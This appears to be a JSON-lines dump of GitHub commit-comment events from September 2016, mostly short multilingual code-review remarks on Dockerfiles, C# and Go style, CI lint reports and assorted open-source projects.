{"id":"4515973129","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18897967,"position":40,"line":40,"path":"content/contributing/core-team/contents.lr","commit_id":"26fd5cf74524e7a90e24c041f8df3cfe6b89a69d","created_at":"2016-09-05T09:34:56Z","updated_at":"2016-09-05T09:34:56Z","body":"Honestly - I'd be happy to drop this as soon as there are enough eyeballs to warrant it."}},"created_at":"2016-09-05T09:34:56Z"}
{"id":"4515977978","type":"CommitCommentEvent","actor":{"login":"imranhassan009"},"repo":{"name":"imranhassan009/mongo-hadoop"},"payload":{"comment":{"id":18897972,"position":null,"line":null,"path":null,"commit_id":"4507e570f3aa701213f19cf745c4548bb5ef5d74","created_at":"2016-09-05T09:36:05Z","updated_at":"2016-09-05T09:36:05Z","body":"Hi \r\ni am a beginner in hadoop and mongo-hadoop connector \r\nhow can run the examples ?"}},"created_at":"2016-09-05T09:36:05Z"}
{"id":"4515982473","type":"CommitCommentEvent","actor":{"login":"apals"},"repo":{"name":"kbarr1/test"},"payload":{"comment":{"id":18897987,"position":null,"line":null,"path":null,"commit_id":"1e9ec09dda09ad51ec4fe1a0e4936c37ffec1cc5","created_at":"2016-09-05T09:37:05Z","updated_at":"2016-09-05T09:37:05Z","body":"bra commit!!"}},"created_at":"2016-09-05T09:37:05Z"}
{"id":"4515982636","type":"CommitCommentEvent","actor":{"login":"afliw"},"repo":{"name":"afliw/FerreteriaSL"},"payload":{"comment":{"id":18897988,"position":null,"line":null,"path":null,"commit_id":"7e4efd98a8a5b28de4d3abea13681e970c8db778","created_at":"2016-09-05T09:37:07Z","updated_at":"2016-09-05T09:37:07Z","body":"Fixes #7"}},"created_at":"2016-09-05T09:37:07Z"}
{"id":"4515983732","type":"CommitCommentEvent","actor":{"login":"fernand0"},"repo":{"name":"ReVision-Docencia-20/Columnas"},"payload":{"comment":{"id":18897992,"position":null,"line":null,"path":null,"commit_id":"a3f0ec60abe69f1ce876a37b6c840b310158cf0e","created_at":"2016-09-05T09:37:19Z","updated_at":"2016-09-05T09:37:19Z","body":"utf-8. He tenido que arrancar emacs para verlo. Luego no sabía salir. Voy a\nver si puedo pasarlo a latin1\n\nOn Mon, Sep 5, 2016 at 11:24 AM, Juan Julián Merelo Guervós <\nnotifications@github.com> wrote:\n\n> Es copiado y pegado desde el anterior... La verdad es que tuvimos un buen\n> follón con eso, pero no lo sé. ¿Latin1?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ReVision-Docencia-20/Columnas/commit/a3f0ec60abe69f1ce876a37b6c840b310158cf0e#commitcomment-18897868>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAJo0l3KIjX7QdY2J4o3GA2ErWOE4_Jks5qm9_agaJpZM4J0xvM>\n> .\n>\n\n\n\n-- \nFernando Tricas\nhttp://elmundoesimperfecto.com/\n"}},"created_at":"2016-09-05T09:37:19Z"}
{"id":"4515988342","type":"CommitCommentEvent","actor":{"login":"PtiLuky"},"repo":{"name":"assomaker/manifmaker"},"payload":{"comment":{"id":18898004,"position":null,"line":null,"path":null,"commit_id":"c7c572f6046927c5cae825a2e4206eb3d45d5cbf","created_at":"2016-09-05T09:38:23Z","updated_at":"2016-09-05T09:38:23Z","body":"Ouaip', j'avais vu ce scrolling qui se décalait sans comprendre pourquoi.\r\n\r\nJe fais l'issue."}},"created_at":"2016-09-05T09:38:23Z"}
{"id":"4515992717","type":"CommitCommentEvent","actor":{"login":"l0rd"},"repo":{"name":"dharmit/che"},"payload":{"comment":{"id":18898009,"position":12,"line":12,"path":"Dockerfile.centos","commit_id":"2ab1f19d23cd4dd176e60ecbe68e7e1ba56c822b","created_at":"2016-09-05T09:39:22Z","updated_at":"2016-09-05T09:39:22Z","body":"You should probably add `-f Dockerfile.centos` here:\r\n`docker build -t condenvy/che-server -f Dockerfile.centos .`"}},"created_at":"2016-09-05T09:39:22Z"}
{"id":"4515997003","type":"CommitCommentEvent","actor":{"login":"angelikii"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":18898018,"position":null,"line":null,"path":null,"commit_id":"0d570a506a1b51f5333c7741c47e714d55c35ab2","created_at":"2016-09-05T09:40:19Z","updated_at":"2016-09-05T09:40:19Z","body":"I was expecting that we would have to create an array list of wordViews so that we add a new TextView to the rootView every time. Now we add the same wordView with different content to the rootView and it is accepted. I wonder how this can be right."}},"created_at":"2016-09-05T09:40:19Z"}
{"id":"4515999998","type":"CommitCommentEvent","actor":{"login":"afliw"},"repo":{"name":"afliw/FerreteriaSL"},"payload":{"comment":{"id":18898023,"position":null,"line":null,"path":null,"commit_id":"7e4efd98a8a5b28de4d3abea13681e970c8db778","created_at":"2016-09-05T09:40:57Z","updated_at":"2016-09-05T09:40:57Z","body":"Fixes #7"}},"created_at":"2016-09-05T09:40:57Z"}
{"id":"4516000377","type":"CommitCommentEvent","actor":{"login":"oiad"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18898024,"position":null,"line":null,"path":null,"commit_id":"530ed4b3b498ee95078522eb77b1377e3977ca49","created_at":"2016-09-05T09:41:02Z","updated_at":"2016-09-05T09:41:02Z","body":"@ebaydayz and I tried a few different ways to incite a dupe and we couldn't get it to happen, the playerNear check helped fix a lot of this, on the test server the PVEH was virtually instant, I imagine there would be some lag involved if 30+ players were online for sure, but the playerNear would still fire.\r\n\r\nNow that we've changed it to only be mines or supply crates, we could even bump this distance from 10 to 20 or so to be extra sure."}},"created_at":"2016-09-05T09:41:02Z"}
{"id":"4516001220","type":"CommitCommentEvent","actor":{"login":"fredrikmoller"},"repo":{"name":"SystemaAS/espedsg"},"payload":{"comment":{"id":18898027,"position":null,"line":null,"path":null,"commit_id":"b2fd78b26c8630b57628e72e87d4cb8100bb4726","created_at":"2016-09-05T09:41:14Z","updated_at":"2016-09-05T09:41:14Z","body":"@oscarsystema \r\n\r\nHar gjort datum konvertering ISO <-> NO , men det känns inte helt snyggt i `JsonMaintSadExportSadavgeRecord`\r\n\r\nmen det funkar förmodligen bra och går att använda som mönster.\r\n\r\nComments?\r\n\r\n//Fredrik"}},"created_at":"2016-09-05T09:41:14Z"}
{"id":"4516007584","type":"CommitCommentEvent","actor":{"login":"lrz-hal"},"repo":{"name":"lrz-hal/source-repo-20160905094232358"},"payload":{"comment":{"id":18898036,"position":1,"line":null,"path":"README.md","commit_id":"5fe228b77d444d80903e0d902cbe7ccc82b09342","created_at":"2016-09-05T09:42:38Z","updated_at":"2016-09-05T09:42:38Z","body":"I am a nice comment"}},"created_at":"2016-09-05T09:42:38Z"}
{"id":"4516007730","type":"CommitCommentEvent","actor":{"login":"davidbasalla"},"repo":{"name":"alphagov/mapit"},"payload":{"comment":{"id":18898037,"position":6,"line":5,"path":"import-db-from-s3.sh","commit_id":"da332167657f68cb30a7a4a0a65f8d73dfe100ba","created_at":"2016-09-05T09:42:41Z","updated_at":"2016-09-05T09:42:41Z","body":"Previously the file naming convention was something like `mapit-postgres93-May2016.sql.gz`, where the \"May2016\" bit was referencing the release of the datasets. I like that we have an upload timestamp now as prefix, but think it would probably be useful to keep that suffix as well."}},"created_at":"2016-09-05T09:42:41Z"}
{"id":"4516009557","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18898039,"position":5,"line":6,"path":"ChickenAdventure/Assets/Scripts/Arme.cs","commit_id":"93e987762013b4b29f86112b3a5ac85221853c96","created_at":"2016-09-05T09:43:07Z","updated_at":"2016-09-05T09:43:07Z","body":"N'êtes-vous pas passé par la case CPLN ou Cifom ?\r\n\r\nEn C#, la convention veut qu'une classe, une méthode ou une propriété commence par une majuscule (`CamelCase`). Un attribut/membre (protégé ou privé) sera en minuscule (`snakeCase`)."}},"created_at":"2016-09-05T09:43:07Z"}
{"id":"4516011341","type":"CommitCommentEvent","actor":{"login":"grawity"},"repo":{"name":"grymer/eduroam"},"payload":{"comment":{"id":18898045,"position":null,"line":null,"path":null,"commit_id":"5467555026c9256d2ca16b3606234bbd81898e2e","created_at":"2016-09-05T09:43:30Z","updated_at":"2016-09-05T09:43:30Z","body":"Many settings here seem redundant and equal to defaults -- `peaplabel=0`, `auth_alg`, `mode`, `priority`, `scan_ssid` can definitely be dropped. (Not sure if I'd bother with `pairwise` and `group`.)\r\n\r\n`subject_match` is somewhat deprecated; `domain_match=\"network.tokens.csx.cam.ac.uk\"` is simpler."}},"created_at":"2016-09-05T09:43:30Z"}
{"id":"4516012125","type":"CommitCommentEvent","actor":{"login":"MichaelBui"},"repo":{"name":"dientm55/golang-demo-echo.labstack"},"payload":{"comment":{"id":18898048,"position":36,"line":36,"path":"src/com.dientm.bookstore/beans/BookStore.go","commit_id":"ef01b652a6bec971f12e362bb3fdb3eecfc4666a","created_at":"2016-09-05T09:43:40Z","updated_at":"2016-09-05T09:43:40Z","body":"Ham `ExtendSize` khong that su can thiet neu E dung cau truc du lieu kieu `slice` thay vi `array`. Slice no se tu dong double capacity len khi can them o nho"}},"created_at":"2016-09-05T09:43:40Z"}
{"id":"4516014968","type":"CommitCommentEvent","actor":{"login":"jamesleesaunders"},"repo":{"name":"nioinnovation/python-xbee"},"payload":{"comment":{"id":18898054,"position":null,"line":null,"path":null,"commit_id":"d72bfa02bd018c970ebd79b9e007bdff005a801c","created_at":"2016-09-05T09:44:17Z","updated_at":"2016-09-05T09:44:17Z","body":"I was also tempted to rename Fake.py to FakeSerial.py to make it more obvious what the file is. I don't know what you think about this proposal also? \n\nHappy to do in this (or a separate) PR if you think a good idea?"}},"created_at":"2016-09-05T09:44:17Z"}
{"id":"4516015973","type":"CommitCommentEvent","actor":{"login":"DaSchTour"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18898057,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T09:44:29Z","updated_at":"2016-09-05T09:44:29Z","body":"Just because it proves the US centric view of US developers. Hello, there is a world outside the USA!"}},"created_at":"2016-09-05T09:44:29Z"}
{"id":"4516016176","type":"CommitCommentEvent","actor":{"login":"fidele007"},"repo":{"name":"fidele007/khmer-smarter-keyboard"},"payload":{"comment":{"id":18898058,"position":null,"line":null,"path":null,"commit_id":"43f52c7e8d1caa7c945d1c28dc22e2b8e7c06524","created_at":"2016-09-05T09:44:33Z","updated_at":"2016-09-05T09:44:33Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Ltx6k99B&#x2F;17-feature-use-wallpaper-as-keyboard-s-background\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [Feature] Use wallpaper as keyboard&#39;s background</a>"}},"created_at":"2016-09-05T09:44:33Z"}
{"id":"4516016450","type":"CommitCommentEvent","actor":{"login":"nicholst"},"repo":{"name":"INCF/bidsutils"},"payload":{"comment":{"id":18898059,"position":null,"line":null,"path":null,"commit_id":"020d88fd5dc974f19284bb0bf426ec8ed60b715f","created_at":"2016-09-05T09:44:37Z","updated_at":"2016-09-05T09:44:37Z","body":"Yes... what I sent to Chris included those mods."}},"created_at":"2016-09-05T09:44:37Z"}
{"id":"4516016583","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.drafts"},"payload":{"comment":{"id":18898060,"position":null,"line":null,"path":null,"commit_id":"e89f699de486cab28452bf724905c9238195d534","created_at":"2016-09-05T09:44:39Z","updated_at":"2016-09-05T09:44:39Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.drafts/14/violations\n```\nplone/app/drafts/dexterity.py:135:1: C901 'autosave' is too complex (15)\nplone/app/drafts/tests.py:1135:15: S001 found % formatter\nplone/app/drafts/tests.py:1175:15: S001 found % formatter\nplone/app/drafts/tests.py:1222:13: P101 format string does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-05T09:44:39Z"}
{"id":"4516017969","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18898062,"position":56,"line":56,"path":"content/contributing/core-team/contents.lr","commit_id":"26fd5cf74524e7a90e24c041f8df3cfe6b89a69d","created_at":"2016-09-05T09:44:57Z","updated_at":"2016-09-05T09:44:57Z","body":"Can we come up with some more general, preferably objective guidelines? I know it can't be as simple as \"N commits\", but some factors like the following might work:\r\n - regular engagement over a 2 month period.\r\n - contribution of a feature that demonstrates significant platform knowledge\r\n - contribution of a significant process improvement\r\n\r\nIdeally, I would like to be in a position where there's a semi-automated process by which someone can quantify that they're eligible to get the commit bit if they want it - or that we can automate the process of asking them.\r\n\r\nOne thought - if existing team members can put a \"gold star\" (or some similar token) on a particular commit, anyone with N gold stars is offered the commit bit. \r\n\r\nThoughts?\r\n"}},"created_at":"2016-09-05T09:44:57Z"}
{"id":"4516018067","type":"CommitCommentEvent","actor":{"login":"lrz-hal"},"repo":{"name":"lrz-hal/source-repo-20160905094452791"},"payload":{"comment":{"id":18898063,"position":1,"line":null,"path":"README.md","commit_id":"9044351f0f19fc3e2a98615c3ff13e24a3cdfe19","created_at":"2016-09-05T09:44:59Z","updated_at":"2016-09-05T09:44:59Z","body":"I am a nice comment"}},"created_at":"2016-09-05T09:44:59Z"}
{"id":"4516018866","type":"CommitCommentEvent","actor":{"login":"lahwaacz"},"repo":{"name":"The-Compiler/qutebrowser"},"payload":{"comment":{"id":18898064,"position":6,"line":357,"path":"qutebrowser/browser/webelem.py","commit_id":"ea4f4e197fd2f0286e74dcd1ffe6db3a501bdf44","created_at":"2016-09-05T09:45:10Z","updated_at":"2016-09-05T09:45:10Z","body":"This checks only if the element is _above_ or _left of_ the view, I think there should be similar checks for the bottom and right borders :wink:"}},"created_at":"2016-09-05T09:45:10Z"}
{"id":"4516018872","type":"CommitCommentEvent","actor":{"login":"euba"},"repo":{"name":"euba/BacArena"},"payload":{"comment":{"id":18898065,"position":null,"line":null,"path":null,"commit_id":"eb776d822c14c0e5e7aa7dc4f10ef6575cd5b6ad","created_at":"2016-09-05T09:45:11Z","updated_at":"2016-09-05T09:45:11Z","body":"If dryweight is Inf, constrain() creates NAs which stop the simulation. Very rare situation, but happened to me once... "}},"created_at":"2016-09-05T09:45:11Z"}
{"id":"4516020975","type":"CommitCommentEvent","actor":{"login":"bpaugam"},"repo":{"name":"LuccaSA/lucca-ui"},"payload":{"comment":{"id":18898071,"position":42,"line":145,"path":"ts/date-picker/calendar.controller.ts","commit_id":"bd52a708370cf8e634171091763322b0e9c453d6","created_at":"2016-09-05T09:45:36Z","updated_at":"2016-09-05T09:45:36Z","body":"@lucienbertin Not sure that's the best way... But that does the job for now."}},"created_at":"2016-09-05T09:45:36Z"}
{"id":"4516025262","type":"CommitCommentEvent","actor":{"login":"freakboy3742"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18898081,"position":49,"line":49,"path":"content/contributing/core-team/contents.lr","commit_id":"26fd5cf74524e7a90e24c041f8df3cfe6b89a69d","created_at":"2016-09-05T09:46:33Z","updated_at":"2016-09-05T09:46:33Z","body":"* Working and committed is better than perfect and not. \r\n\r\n* Acceptance processes should be automated wherever possible. This means tests, linting, spell checking, coverage,..."}},"created_at":"2016-09-05T09:46:33Z"}
{"id":"4516032373","type":"CommitCommentEvent","actor":{"login":"GarethNN"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18898091,"position":90,"line":null,"path":"Script/AtomicNET/AtomicNETService/CSComponentInspector.cs","commit_id":"be974c2fff31862830809a28656c8ed4c11e4077","created_at":"2016-09-05T09:48:10Z","updated_at":"2016-09-05T09:48:10Z","body":"Dead code."}},"created_at":"2016-09-05T09:48:10Z"}
{"id":"4516034078","type":"CommitCommentEvent","actor":{"login":"cmaumet"},"repo":{"name":"INCF/bidsutils"},"payload":{"comment":{"id":18898094,"position":null,"line":null,"path":null,"commit_id":"020d88fd5dc974f19284bb0bf426ec8ed60b715f","created_at":"2016-09-05T09:48:30Z","updated_at":"2016-09-05T09:48:30Z","body":"Great! So we can close #2, but we might want to copy over the `README` before, if it still makes sense with the new modifications. Can you have a look @nicholst: https://github.com/INCF/bidsutils/pull/2/commits/126cf96facea10dba7f6a8b7abb8f1ad53297d1b? If the `README` is okay I can copy it over to `master`."}},"created_at":"2016-09-05T09:48:30Z"}
{"id":"4516039550","type":"CommitCommentEvent","actor":{"login":"afliw"},"repo":{"name":"afliw/FerreteriaSL"},"payload":{"comment":{"id":18898106,"position":null,"line":null,"path":null,"commit_id":"857e40b05b5aeb2e0a4677f1364e54776c50a199","created_at":"2016-09-05T09:49:43Z","updated_at":"2016-09-05T09:49:43Z","body":"Closes #8"}},"created_at":"2016-09-05T09:49:43Z"}
{"id":"4516040392","type":"CommitCommentEvent","actor":{"login":"GarethNN"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18898111,"position":124,"line":null,"path":"Script/AtomicNET/AtomicNET/Core/AObject.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T09:49:54Z","updated_at":"2016-09-05T09:49:54Z","body":"What are these magic numbers about?"}},"created_at":"2016-09-05T09:49:54Z"}
{"id":"4516042601","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18898116,"position":90,"line":null,"path":"Script/AtomicNET/AtomicNETService/CSComponentInspector.cs","commit_id":"be974c2fff31862830809a28656c8ed4c11e4077","created_at":"2016-09-05T09:50:26Z","updated_at":"2016-09-05T09:50:26Z","body":"From the original code (hard to tell because whitespace also changed-fail). Only actual change was addition of loop to find CSComponent superclass."}},"created_at":"2016-09-05T09:50:26Z"}
{"id":"4516045653","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.drafts"},"payload":{"comment":{"id":18898120,"position":null,"line":null,"path":null,"commit_id":"9994fd16dd8a49ff04b728588cc42bb7607fe4c2","created_at":"2016-09-05T09:51:05Z","updated_at":"2016-09-05T09:51:05Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.drafts/15/violations\n```\nplone/app/drafts/dexterity.py:135:1: C901 'autosave' is too complex (15)\nplone/app/drafts/tests.py:1135:15: S001 found % formatter\nplone/app/drafts/tests.py:1175:15: S001 found % formatter\nplone/app/drafts/tests.py:1222:13: P101 format string does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-05T09:51:05Z"}
{"id":"4516047116","type":"CommitCommentEvent","actor":{"login":"GarethNN"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18898124,"position":167,"line":null,"path":"Script/AtomicNET/AtomicNET/Core/NativeCore.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T09:51:25Z","updated_at":"2016-09-05T09:51:25Z","body":"Dead code."}},"created_at":"2016-09-05T09:51:25Z"}
{"id":"4516048297","type":"CommitCommentEvent","actor":{"login":"GarethNN"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18898127,"position":184,"line":null,"path":"Script/AtomicNET/AtomicNET/Core/NativeCore.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T09:51:41Z","updated_at":"2016-09-05T09:51:41Z","body":"Dead code."}},"created_at":"2016-09-05T09:51:41Z"}
{"id":"4516049030","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18898128,"position":124,"line":null,"path":"Script/AtomicNET/AtomicNET/Core/AObject.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T09:51:52Z","updated_at":"2016-09-05T09:51:52Z","body":"GetHash implementation suggested by Jon Skeet: http://stackoverflow.com/a/263416/156328\r\n\r\nWill add comment."}},"created_at":"2016-09-05T09:51:52Z"}
{"id":"4516049631","type":"CommitCommentEvent","actor":{"login":"GarethNN"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18898131,"position":193,"line":null,"path":"Script/AtomicNET/AtomicNET/Core/NativeCore.cs","commit_id":"09c4b27b0716cc9a4970e674da4781b84a7d60da","created_at":"2016-09-05T09:52:00Z","updated_at":"2016-09-05T09:52:00Z","body":"Dead code (and a few lines below)"}},"created_at":"2016-09-05T09:52:00Z"}
{"id":"4516054298","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":18898145,"position":null,"line":null,"path":null,"commit_id":"46ab29f331abef2dbbb667b20c3cb2ae941c8e92","created_at":"2016-09-05T09:53:01Z","updated_at":"2016-09-05T09:53:01Z","body":"After this commit Bonus Quests/Tasks icons on map are messed..."}},"created_at":"2016-09-05T09:53:01Z"}
{"id":"4516055617","type":"CommitCommentEvent","actor":{"login":"lodici"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18898148,"position":null,"line":null,"path":null,"commit_id":"4ca2f3099f7b51c0163df93026808e677e2fcf2c","created_at":"2016-09-05T09:53:18Z","updated_at":"2016-09-05T09:53:18Z","body":"![screenshot00536](https://cloud.githubusercontent.com/assets/2443519/18244243/ef6c79c8-7356-11e6-84a3-25bb9cc78a36.png)\r\n"}},"created_at":"2016-09-05T09:53:18Z"}
{"id":"4516055715","type":"CommitCommentEvent","actor":{"login":"Messiah7"},"repo":{"name":"MyM-ModpackTeam/hypovolemia"},"payload":{"comment":{"id":18898149,"position":null,"line":null,"path":null,"commit_id":"c11d3bda0a48eb058ac3afd0208e4c540d0c6850","created_at":"2016-09-05T09:53:19Z","updated_at":"2016-09-05T09:53:19Z","body":"Also not work recipe\r\ncastBroadAxeHead\r\nand\r\ncastExcahatorHead"}},"created_at":"2016-09-05T09:53:19Z"}
{"id":"4516059225","type":"CommitCommentEvent","actor":{"login":"l0rd"},"repo":{"name":"dharmit/che"},"payload":{"comment":{"id":18898158,"position":33,"line":33,"path":"Dockerfile.centos","commit_id":"2ab1f19d23cd4dd176e60ecbe68e7e1ba56c822b","created_at":"2016-09-05T09:54:08Z","updated_at":"2016-09-05T09:54:08Z","body":"There are a couple of differences compared to the ubuntu Dockerfile that you should take in consideration:\r\n- Version 1.6 of Docker should be used. This is needed because it's the only client compatible with Docker daemons from version 1.6 to 1.12. That sounds weird but it's the only to make sure che-server image is able to run on hosts with any version of Docker .\r\n- Docker is not installed with a package manager. Only a Docker client is needed so installation of Docker is more than we need."}},"created_at":"2016-09-05T09:54:08Z"}
{"id":"4516060318","type":"CommitCommentEvent","actor":{"login":"teclxl"},"repo":{"name":"top-think/framework"},"payload":{"comment":{"id":18898161,"position":null,"line":null,"path":null,"commit_id":"bd0968b4076159993d94838d57093041545c2c50","created_at":"2016-09-05T09:54:21Z","updated_at":"2016-09-05T09:54:21Z","body":"修改后，控制器名被显示的转换成驼峰法，为什么。"}},"created_at":"2016-09-05T09:54:21Z"}
{"id":"4516060352","type":"CommitCommentEvent","actor":{"login":"BarryCarlyon"},"repo":{"name":"nexcess/magento-turpentine"},"payload":{"comment":{"id":18898162,"position":null,"line":null,"path":null,"commit_id":"9f4178cfaabc9079f1557f41a08124d6857d8d8d","created_at":"2016-09-05T09:54:21Z","updated_at":"2016-09-05T09:54:21Z","body":"Why did this get moved to the bottom.\r\nI hadn't noticed this change and now my Varnish configuration is trashed :-P"}},"created_at":"2016-09-05T09:54:21Z"}
{"id":"4516063071","type":"CommitCommentEvent","actor":{"login":"vdeturckheim"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18898168,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T09:54:59Z","updated_at":"2016-09-05T09:54:59Z","body":"AFAIK, angular is a project sponsored by an US company named Google (you might have heard of them). \r\nPlease restrain yourself from such xenophobic general statements."}},"created_at":"2016-09-05T09:54:59Z"}
{"id":"4516065692","type":"CommitCommentEvent","actor":{"login":"MichaelBui"},"repo":{"name":"dientm55/golang-demo-echo.labstack"},"payload":{"comment":{"id":18898177,"position":21,"line":21,"path":"src/com.dientm.bookstore/beans/Book.go","commit_id":"ef01b652a6bec971f12e362bb3fdb3eecfc4666a","created_at":"2016-09-05T09:55:38Z","updated_at":"2016-09-05T09:55:38Z","body":"E co the dung syntax khoi tao cua struct nhu sau: \r\n```\r\nb := Book{\r\n    Title: title\r\n    Author: author\r\n    Desc: desc\r\n}\r\n```"}},"created_at":"2016-09-05T09:55:38Z"}
{"id":"4516073236","type":"CommitCommentEvent","actor":{"login":"mikeblakeuk"},"repo":{"name":"Azure/azure-rest-api-specs"},"payload":{"comment":{"id":18898193,"position":430,"line":430,"path":"arm-commerce/2015-06-01-preview/swagger/commerce.json","commit_id":"575a82034b28f1a92fac48031b3d4cc59fff771b","created_at":"2016-09-05T09:57:23Z","updated_at":"2016-09-05T09:57:23Z","body":"@amarzavery minor Typo of 'ehe' vs 'the'"}},"created_at":"2016-09-05T09:57:23Z"}
{"id":"4516074738","type":"CommitCommentEvent","actor":{"login":"kdave"},"repo":{"name":"markfasheh/btrfs-progs-patches"},"payload":{"comment":{"id":18898198,"position":null,"line":null,"path":null,"commit_id":"6df7f4e005c984f06a0f44d4407cbab5d40999cb","created_at":"2016-09-05T09:57:44Z","updated_at":"2016-09-05T09:57:44Z","body":"FYI, this fix does not work, the false warnings are still there, compared to 4.6.1"}},"created_at":"2016-09-05T09:57:44Z"}
{"id":"4516078277","type":"CommitCommentEvent","actor":{"login":"templton"},"repo":{"name":"templton/StockBundle"},"payload":{"comment":{"id":18898209,"position":null,"line":null,"path":null,"commit_id":"03e5ac37c4d6af18850d8e58c13146492b575150","created_at":"2016-09-05T09:58:32Z","updated_at":"2016-09-05T09:58:32Z","body":"sad"}},"created_at":"2016-09-05T09:58:32Z"}
{"id":"4516084534","type":"CommitCommentEvent","actor":{"login":"jeroenooms"},"repo":{"name":"r-hub/rhub-frontend"},"payload":{"comment":{"id":18898224,"position":9,"line":108,"path":"public/data/platforms.json","commit_id":"63da441bcbcfa73d6d4af11d23527dd01bccb42c","created_at":"2016-09-05T09:59:55Z","updated_at":"2016-09-05T09:59:55Z","body":"This image actually has Undefined Behavior Sanitizer (UBSAN) in addition to the address sanitizer (ASAN)."}},"created_at":"2016-09-05T09:59:55Z"}
{"id":"4518637903","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18904267,"position":null,"line":null,"path":null,"commit_id":"ba4fedaea64a4045cb3f9810b3d65e162408f5ec","created_at":"2016-09-06T00:01:02Z","updated_at":"2016-09-06T00:01:02Z","body":"Mobility will increase for some of these pieces and we already have something about this. But who knows ?"}},"created_at":"2016-09-06T00:01:02Z"}
{"id":"4518638555","type":"CommitCommentEvent","actor":{"login":"Kali-"},"repo":{"name":"sonyxperiadev/device-sony-karin_windy"},"payload":{"comment":{"id":18904268,"position":null,"line":null,"path":null,"commit_id":"fb2c3713c8887ce62c1c019045712ab858555438","created_at":"2016-09-06T00:01:27Z","updated_at":"2016-09-06T00:01:27Z","body":"this is currently breaking z4t wifi (LTE should work)"}},"created_at":"2016-09-06T00:01:27Z"}
{"id":"4518642397","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":18904272,"position":null,"line":null,"path":null,"commit_id":"1ae3b164aeab8612ce57e5068cb12f2401e83e41","created_at":"2016-09-06T00:03:47Z","updated_at":"2016-09-06T00:03:47Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;PraBWyIM&#x2F;36-mail\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Mail</a>"}},"created_at":"2016-09-06T00:03:47Z"}
{"id":"4518642691","type":"CommitCommentEvent","actor":{"login":"lurch"},"repo":{"name":"RPi-Distro/python-gpiozero"},"payload":{"comment":{"id":18904273,"position":65,"line":576,"path":"gpiozero/pins/data.py","commit_id":"6cc308e44a987db1cc3e038b07627add91e1c5ad","created_at":"2016-09-06T00:03:59Z","updated_at":"2016-09-06T00:03:59Z","body":"P.S. Ah, and I've just realised that even if `_parse_pi_revision` **did** (somehow) get triggered, the `pcb_revision = '1.%d' % (revision & 0x0f)` code means that the 'earlier' Pi Zero `pcb_revision` will actually come out as `1.2`, rather than `1.0` ! Whoops.\r\n\r\nAnd strictly speaking I guess the `# RRRR     - Revision (0, 1, or 2)` comment is no longer correct, as the newer Pi Zero's have a revision-code of 3."}},"created_at":"2016-09-06T00:03:59Z"}
{"id":"4518642922","type":"CommitCommentEvent","actor":{"login":"Accelarator36"},"repo":{"name":"Accelarator36/Labor-day-test"},"payload":{"comment":{"id":18904274,"position":null,"line":null,"path":null,"commit_id":"4be6891528f9e0fdf8d9b0c978555528289a32f7","created_at":"2016-09-06T00:04:10Z","updated_at":"2016-09-06T00:04:10Z","body":"Everybody is working hard for something."}},"created_at":"2016-09-06T00:04:10Z"}
